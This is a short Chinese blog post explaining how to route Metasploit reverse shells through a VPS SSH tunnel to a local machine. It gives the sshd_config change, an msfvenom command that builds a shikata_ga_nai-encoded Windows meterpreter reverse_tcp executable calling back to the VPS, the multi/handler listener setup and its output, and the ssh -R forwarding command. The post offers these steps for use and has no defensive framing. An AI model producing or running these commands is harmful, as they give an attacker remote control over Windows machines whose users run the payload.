通过VPS SSH隧道使用本地msf

  • 内容
  • 相关
这里首先需要配置VPS ssh服务

编辑 /etc/ssh/sshd_config

在文件最后添加

GatewayPorts ye

重启ssh服务

之后配置msf客户端:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b
‘\x00’ LHOST=[vpsIP] LPORT=8888 -f exe > abc.exe

之后本地启用监听:


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.100
lhost => 192.168.2.100
msf exploit(handler) > set lport 8888
lport => 8888
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.100:8888

开启ssh隧道:

ssh -N -R 8888:192.168.2.100:8888 echo@k1q.cn


客户端被执行以后,成功返回回话:


微信图片_20191216155616.jpg

本文标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:通过VPS SSH隧道使用本地msf - https://www.k1q.cn/post-60.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注